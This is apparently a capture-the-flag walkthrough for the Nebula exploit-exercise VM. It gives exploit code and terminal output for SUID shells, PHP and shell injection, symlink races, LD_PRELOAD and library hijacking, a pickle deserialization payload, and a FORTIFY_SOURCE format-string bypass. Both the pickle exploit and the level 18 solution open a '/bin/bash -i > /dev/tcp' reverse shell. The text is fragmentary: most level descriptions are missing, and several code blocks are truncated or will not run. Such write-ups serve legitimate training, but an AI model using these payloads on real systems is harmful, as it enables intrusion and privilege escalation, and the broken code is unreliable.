Nebula Solutions - All Levels

Nebula is the first of three exploit discs provided by exploit exercises. I’ve seen a couple walkthroughs of these levels around, but as a completionist, and for future reference, I’ve cleaned my notes up a bit and am posting them here. I will also post my notes for the other two systems sometime after. This post includes a walkthrough of all 20 levels.


gcc /tmp/shell.c -o /home/flag03/shell
chmod +s /home/flag03/shell

You’ll just need to create shell.c in tmp and wait for it to run; I took the source code from level 1 and changed the system command to execute /bin/bash instead. Execute chmod +x on and wait for your binary to be generated. Once it is, execute it for your flag. One thing to note is that it would be much easier to echo a shell script and suid that; alas, Linux prevents us from suid’ing scripts, and for very good reason.

In order to exploit this, we need to set the email portion of the regex to spawn us a shell. This can be done with the following entry: ([email {${system($use_me)}}]), where $use_me is $argv[2] to the executable. Wrapping the command in ${system} allows the PHP engine to interpret the command properly, and the extra pair of curly braces for escaping. Pass in /bin/bash to capture your flag.


unlink /tmp/token
touch /tmp/token
/home/flag10/flag10 /tmp/token &
rm -f /tmp/token
ln -s /home/flag10/token /tmp/token

I then started up a netcat listener on my remote host. After about 30-40 iterations, I had flag 10’s password.

level13@nebula: cat moduid.c
#include <unistd.h>
uid_t getuid(){ return 1000; }
level13@nebula: gcc -shared -o moduid.c
level13@nebula: ./flag13

Running this dumps our token to stdout. Another method may be modifying the binary itself, but I don’t know how legal that is. This was a neat vulnerability, and something I haven’t run into before.

abcdefg -> acegikm
a -> a (idx + 0)
b -> c (idx + 1)
c -> e (idx + 2)
d -> g (idx + 3)
e -> i (idx + 4)
f -> k (idx + 5)
g -> m (idx + 6)

So to reverse this, we just need to subtract the index. I wrote a quick python script for doing this:

import sys

def decrypt(args):
    ciph = args[2]
    plain = ''
    print 'Decrypting ', ciph
    for idx in xrange(len(ciph)):
        tmp = (ord(ciph[idx])-65)-idx
        plain += chr(tmp+65)
    print 'Decrypted: ', plain

def encrypt(args):
    plain = args[2]
    ciph = ''
    print 'Encrypting ', plain
    for idx in xrange(len(plain)):
        tmp = (ord(plain[idx])-65)+idx
        ciph += chr(tmp+65)
    print 'Encrypted: ', ciph

if len(sys.argv) < 2:
    print '%s: [-d] [cipher] [-e] [plain]'%sys.argv[0]

if '-d' in sys.argv:
elif '-e' in sys.argv:

Now we just need to pass in the output of the encrypted token file to obtain our flag.

level15@nebula:/tmp$ cat wrapper.c
#include <unistd.h>

int __wrap_puts(const char *s){
    system("/bin/getflag > /tmp/flagged");
    return puts(s);
level15@nebula:/tmp$ gcc -Wl,-wrap,write -shared -o /tmp/ /tmp/wrapper.c
level15@nebula:/tmp$ LD_PRELOAD=/tmp/ ./flag15

Unfortunately, the protection mechanism for preloading libraries catches us. The loader will completely ignore the preloaded library if the RUID is not equal to the EUID and unlike level 13, we need to execute a binary, not simply obtain a token embedded in the binary.

So instead we need to compile a statically linked library and get it to call that library with whatever function it’s using. Object dumping the file, we find our main quite small:

level15@nebula:/home/flag15$ objdump -d -M intel flag15 
08048330 <main>:
 8048330:  55                     push   %ebp
 8048331:  89 e5                  mov    %esp,%ebp
 8048333:  83 e4 f0               and    $0xfffffff0,%esp
 8048336:  83 ec 10               sub    $0x10,%esp
 8048339:  c7 04 24 d0 84 04 08   movl   $0x80484d0,(%esp)
 8048340:  e8 bb ff ff ff         call   8048300 <puts@plt>
 8048345:  c9                     leave  
 8048346:  c3                     ret    
 8048347:  90                     nop

The only function it calls is puts, so we need to override that; we also need a target location. /var/tmp/flag15/ appears to be the least nested. Here’s the library code:

level15@nebula:/home/flag15$ cat /tmp/lib.c
#include <stdio.h>
#include <stdlib.h>

int puts(const char *s){
  system("/bin/getflag > /tmp/flagged");

int __libc_start_main(int (*main)(int, char **, char **), 
           int argc, char **argv,
          void (*init)(void),
          void (*fini)(void),
          void (*rtld_fini)(void),
          void (*stack_end))
    { main(argc, argv, NULL);
  return 0;

We just need to compile and statically link this to the library path:

level15@nebula:/home/flag15$ gcc -Wall -fPIC -o /tmp/libc.o -c /tmp/lib.c
/tmp/lib.c: In function ‘puts’:
/tmp/lib.c:6:1: warning: control reaches end of non-void function [-Wreturn-type]
level15@nebula:/home/flag15$ gcc -shared -W1,-Bstatic,-soname, -o /var/tmp/flag15/ /tmp/libc.o -static
level15@nebula:/home/flag15$ ./flag15
./flag15: /var/tmp/flag15/ no version information available (required by ./flag15)
./flag15: /var/tmp/flag15/ no version information available (required by /var/tmp/flag15/
./flag15: relocation error: /var/tmp/flag15/ symbol __deregister_frame_info, version GLIBC_2.0 not defined in file with link time reference

This, apparently, means that the library version number is lower on the shared object. So we’ll need to generate a version file and link it in:

level15@nebula:/home/flag15$ cat /tmp/versionz 
GLIBC_2.1.3 {


Recompile with –version-script=/tmp/versionz and…

level15@nebula:/home/flag15$ ./flag15
Segmentation fault
level15@nebula:/home/flag15$ cat /tmp/flagged
You have successfully executed getflag on a target account
@output = `egrep "^$username" /home/flag16/userdb.txt 2>&1`;

This level took a bit of thought and a frustrating amount of tinkering; it’s obvious where the vulnerability is, but it’s not so obvious what we actually need to do. All input is run through the two filters, so we’ll need to either send in post-manipulated data that will be changed back when run, or some other voodoo that’ll correctly be interpreted by bash and not touched by the filters.

The easiest, and shortest, command will be a script. Normally, you wouldn’t have access to the underlying host, but we do, so for now we’ll take advantage of it. I"ll admit I spent more time Googling around for this one than any of the previous; I happened to stumble into this Stack Overflow post about bash wildcard expansion:

level16@nebula:~$ pwd
level16@nebula:~$ ls
level16@nebula:~$ ls /*/SHELL

Wildcards aren’t anything new, but I never knew that you could use it as such. This means we need to have our username evaluated as /*/shell, so when it’s expanded it’ll be /tmp/SHELL. The final result:*%2fshell%60%22&password=dolphin

Add in a netcat call back to a script SHELL in tmp (see level 17) and it’s game over.

Warning The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

Because our input is never sanitized, we just need to send a specially crafted input string to be unpickled and execute malicious code. This Blackhat whitepaper came in handy when figuring out how the parsing engine worked, and once I had that figured out it was pretty easy:

import socket

cmd = "cos\nsystem\n(S'/bin/bash -i > /dev/tcp/ 0>&1'\ntR.\n"
    sock = socket.socket()
    sock.connect(('', 10007))
    data = sock.recv(512)
    print 'Got: ', data
except Exception, e: print e

I had a netcat shell listening on port 5555 for the call back. I used this method because the Nebula box doesn’t have netcat-traditional on it, which lacks the -e flag. This is a neat way of opening a reverse shell without the fuss of named pipes.

level18@nebula:/home/flag18$ ./flag18
*** buffer overflow detected ***: ./flag18 terminated
======= Backtrace: =========
======= Memory map: ========
00324000-00325000 r-xp 00000000 00:00 0          [vdso]
00358000-00376000 r-xp 00000000 07:00 44978      /lib/i386-linux-gnu/
00376000-00377000 r--p 0001d000 07:00 44978      /lib/i386-linux-gnu/
00377000-00378000 rw-p 0001e000 07:00 44978      /lib/i386-linux-gnu/
00c9b000-00cb7000 r-xp 00000000 07:00 45092      /lib/i386-linux-gnu/
00cb7000-00cb8000 r--p 0001b000 07:00 45092      /lib/i386-linux-gnu/
00cb8000-00cb9000 rw-p 0001c000 07:00 45092      /lib/i386-linux-gnu/
00cd6000-00e4c000 r-xp 00000000 07:00 44973      /lib/i386-linux-gnu/
00e4c000-00e4e000 r--p 00176000 07:00 44973      /lib/i386-linux-gnu/
00e4e000-00e4f000 rw-p 00178000 07:00 44973      /lib/i386-linux-gnu/
00e4f000-00e52000 rw-p 00000000 00:00 0 
08048000-0804a000 r-xp 00000000 07:00 12922      /home/flag18/flag18
0804a000-0804b000 r--p 00001000 07:00 12922      /home/flag18/flag18
0804b000-0804c000 rw-p 00002000 07:00 12922      /home/flag18/flag18
082c5000-082e6000 rw-p 00000000 00:00 0          [heap]
b77a8000-b77a9000 rw-p 00000000 00:00 0 
b77b1000-b77b4000 rw-p 00000000 00:00 0 
bfabf000-bfae0000 rw-p 00000000 00:00 0          [stack]

I guess not. It appears it’s been compiled with a bit of protection:

level18@nebula:/home/flag18$ ./ --file flag18
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   flag18

On deeper inspection of the code, it appears there are several logic flaws that could allow simple execution of a root shell.

The first issue is that there’s no restriction on what file we’re debugging to, so long as we’ve got the privileges required to open it. In this case, this means we can debug to the same file that we’re checking passwords against. Since we can’t actually read the file, we need to infer:

level18@nebula:/home/flag18$ ./flag18 -d /home/flag18/password 
^Clevel18@nebula:/home/flag18$ ls -lh password
-rw------- 1 flag18 flag18 31 2013-03-20 00:38 password
level18@nebula:/home/flag18$ echo Starting up. Verbose level = 0 | wc -c

So we read without error and we know the exact data in the file. The problem with this is that it strips newlines, and with fgets we don’t have a nice way of inserting them.

The second issue I discovered involved the command site exec, which doesn’t properly format output, and won’t append newlines (which may be used to further the first issue).

level18@nebula:/home/flag18$ ./flag18 -d /tmp/dbg 
site exec %n
*** %n in writable segment detected ***
level18@nebula:/home/flag18$ ./flag18 -d /tmp/dbg 
site exec %4$x
*** invalid %N$ use detected ***

This means that our binary was likely compiled with FORTIFY_SOURCE=2. Here’s the patch that explains what it is and prevents, and the differences between 1 and 2. Because I don’t take doors slammed in my face very well, and it’s late, it’s time to break out the phrack:

level18@nebula:/home/flag18$ gdb ./flag18 
Reading symbols from /home/flag18/flag18...(no debugging symbols found)...done.
(gdb) r -d /tmp/dbg 
Starting program: /home/flag18/flag18 -d /tmp/dbg
site exec %1$*269168516$x %1073741824$                            

Program received signal SIGSEGV, Segmentation fault.
0x0028b359 in vfprintf () from /lib/i386-linux-gnu/

Exploitation of this wasn’t trivial, but it was eye-opening into some of the things you can accomplish with format string vulnerabilities. Because our binary was compiled with FORTIFY_SOURCE, there are essentially two things we need to do: disable the FORTIFY flag, and disable the argument filler. The argument filler essentially sets every argument in arguments[argc] to -1, then fills in the user supplied arguments. Any -1’s remaining will cause an error. At a high level we’re doing this:

  • Disable FORTIFY_SOURCE flag
  • Modify nargs to blow up
  • Be happy

The Phrack article does a better job of explaining this than I do, so if you’d like an in-depth analysis of all this, follow the article. Anyway – finding and disabling FORTIFY_SOURCE:

level18@nebula:/home/flag18$ gdb ./flag18 
Reading symbols from /home/flag18/flag18...(no debugging symbols found)...done.
(gdb) b vfprintf
Function "vfprintf" not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (vfprintf) pending.
(gdb) r -d /tmp/dbg
site exec %1$*2222848$x %1073741824$

Breakpoint 1, 0x00171140 in vfprintf () from /lib/i386-linux-gnu/
(gdb) c

Breakpoint 1, 0x00171140 in vfprintf () from /lib/i386-linux-gnu/
(gdb) tb *(vfprintf+4649)
Temporary breakpoint 2 at 0x172359
(gdb) c

Breakpoint 1, 0x00171140 in vfprintf () from /lib/i386-linux-gnu/
(gdb) x/x $eax
0xbfffef60:    0xfbad8004
(gdb) x/20wx $eax
0xbfffef60:    0xfbad8004    0xbffff4f8    0x0017192c    0xbffff528
0xbfffef70:    0xbfffcf60    0xbfffcf60    0xbfffef60    0x00000000
0xbfffef80:    0x00000000    0x00000000    0x00000027    0x08049017
0xbfffef90:    0xfbad8004    0x00000000    0x00000000    0x00000004
0xbfffefa0:    0xbfffcf90    0xbf00cfaf    0x00000000    0x00000000
(gdb) x/wx 0xbfffef9c
0xbfffef9c:    0x00000004

There’s obviously a bit of cheating here, but bare with me: we’re essentially breaking on vfprintf, which receives a file pointer, a formatter, and an argument list. We then take a peek at the stack, note our file pointer, and find the flag inside (0x000000004). We know need to calculate the offset:

(gdb) x/wx 0xbfffef9c
0xbfffef9c:    0x00000004
(gdb) p/d ((0xbfffef9c-$ecx)&0xffffffff)/4
$1 = 2847

And accounting for off-by-one, it’s 2848. So:

(gdb) r -d /tmp/dbg
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/flag18/flag18 -d /tmp/dbg
site exec %1$*2848$x %1073741824$

Breakpoint 1, 0x00171140 in vfprintf () from /lib/i386-linux-gnu/
(gdb) tb *(vfprintf+4649)
Temporary breakpoint 4 at 0x172359
(gdb) c

Temporary breakpoint 4, 0x00172359 in vfprintf () from /lib/i386-linux-gnu/
(gdb) x/i $eip
=> 0x172359 <vfprintf+4649>:    mov    DWORD PTR [edx+eax*4],0x0
(gdb) x/wx $ecx+$eax*4
0xbfffef9c:    0x00000004

Great, we’ve got the correct value for clobbering that flag. Now we need to find the offset for clobbering nargs:

(gdb) find 0xbfff0000, 0xbffffff0, 0xdeadbeef
2 patterns found.
(gdb) -r 
Starting program: /home/flag18/flag18 -d /tmp/dbg
site exec %1$*283434$x %1073741824$

Program received signal SIGSEGV, Segmentation fault.
0x00172359 in vfprintf () from /lib/i386-linux-gnu/
(gdb) p/d (0xbfff5568-$ecx)/4 + 1
$6 = 479

I got stuck here for awhile, and after some googling I discovered someone had already solved this level this way! So I took his advice and created an environmental variable that would lower the stack address and not segfault. The final phase is now upon us; smuggling shellcode in. The Phrack article gets a little hairy at this point, so instead of screwing around with adjusting stack offsets, I decided to just take the route that v0id took in his blog post. His process involves setting the loggedin variable by way of taking control of uninitialized stack memory, thanks to Rosenburg’s fantastic post on this topic:

site exec |%20$n| %1$*479$ %1$*2848$ %1073741824$

Program received signal SIGSEGV, Segmentation fault.
0x00d7af00 in vfprintf () from /lib/i386-linux-gnu/
(gdb) i r
eax            0x41414141    1094795585
ecx            0x0    0
edx            0x1    1
ebx            0xeafff4    15400948
esp            0xbfdb8b9c    0xbfdb8b9c
ebp            0xbfdb97e8    0xbfdb97e8
esi            0xbfdbb810    -1076119536
edi            0xbfdb8bc0    -1076130880
eip            0xd7af00    0xd7af00 <vfprintf+11728>
eflags         0x10246    [ PF ZF IF RF ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51

So we just need to find the loggedin variable, then call shell on it:

(gdb) x/2i $eip
=> 0x8048928 <main+376>:    cmp    DWORD PTR ds:0x804b0b4,0x1
   0x804892f <main+383>:    jle    0x804894d <main+413>
(gdb) x/x 0x804b0b4
0x804b0b0 <globals+4>:    0x00000000

Stick that into our LD_PRELOAD, sprinkle in a bit of stack alignment, and…

level18@nebula:/home/flag18$ export LD_PRELOAD=`python -c 'print "\xb4\xb0\x04\x08"*8000'`
level18@nebula:/home/flag18$ gdb ./flag18
(gdb) r -d /tmp/dbg
site exec |%20$n| %1$*479$ %1$*2848$ %1073741824$
./flag18: -d: invalid option
Usage:    ./flag18 [GNU long option] [option] ...
    ./flag18 [GNU long option] [option] script-file ...
GNU long options:
Shell options:
    -irsD or -c command or -O shopt_option        (invocation only)
    -abefhkmnptuvxBCHP or -o option

Success! It’s clearly passing in the -d flag to sh, so…

level18@nebula:/home/flag18$ ./flag18 --rcfile -d /tmp/dbg
site exec |%20$n| %1$*479$ %1$*2848$ %1073741824$
/tmp/dbg: line 1: Starting: command not found
/tmp/dbg: line 2: syntax error near unexpected token `||'
/tmp/dbg: line 2: `|| %134525108%-1274542928 %'
level18@nebula:/home/flag18$ cat /tmp/Starting
/bin/bash -i > /dev/tcp/ 0>&1
level18@nebula:/home/flag18$ export PATH=/tmp:$PATH
level18@nebula:/home/flag18$ ./flag18 --rcfile -d /tmp/dbg
site exec |%20$n| %1$*479$ %1$*2848$ %1073741824$

A shell was waiting for me on Lots of subtle intricacies here, but really quite fun.

The third issue is the following snippet:

26  fp = fopen(PWFILE, "r");
 27  if(fp) {
 28    char file[64];
 30    if(fgets(file, sizeof(file) - 1, fp) == NULL) {
 31      dprintf("Unable to read password file %s\n", PWFILE);
 32      return;
 33    }
 34                fclose(fp);
 35    if(strcmp(pw, file) != 0) return;    
 36  }
 37  dprintf("logged in successfully (with%s password file)\n", 
 38    fp == NULL ? "out" : "");
 40  globals.loggedin = 1;

If the application fails to read PWFILE, the flow will automatically assume the user is logged in. This appears to be either the easy or intermediate way, as source code explicitly calls this case out (with%s password file). This could be defeated by opening up a ton of files and running the binary, effectively erroring out fopen and getting the loggedin flag set.

Parent generates child process:
            -- child
parent ---/

Parent dies:
        -- child
x ----/

init process discovers child and adopts:
         -- child

So we want to fork off a process and kill the parent before it calls flag19. Then, when it goes to stat the process, it will stat init instead of us thereby assuming the role of root. Here’s the code for achieving that:

#include <stdlib.h>

void main(void){
    pid_t pid;
    char cmd[]   = "/home/flag19/flag19";
    char *argv[] = {"/bin/sh", "-c", "/bin/getflag > /tmp/flagged"};

    switch( pid = fork() ){
        case -1:
            perror("failed to fork\n");
        case 0:
            // execute command when parent dies
            execvp(cmd, argv);
            sleep(1); // wait a sec
            exit(1); // ok kill parent

And flag was waiting for us in /tmp/flagged.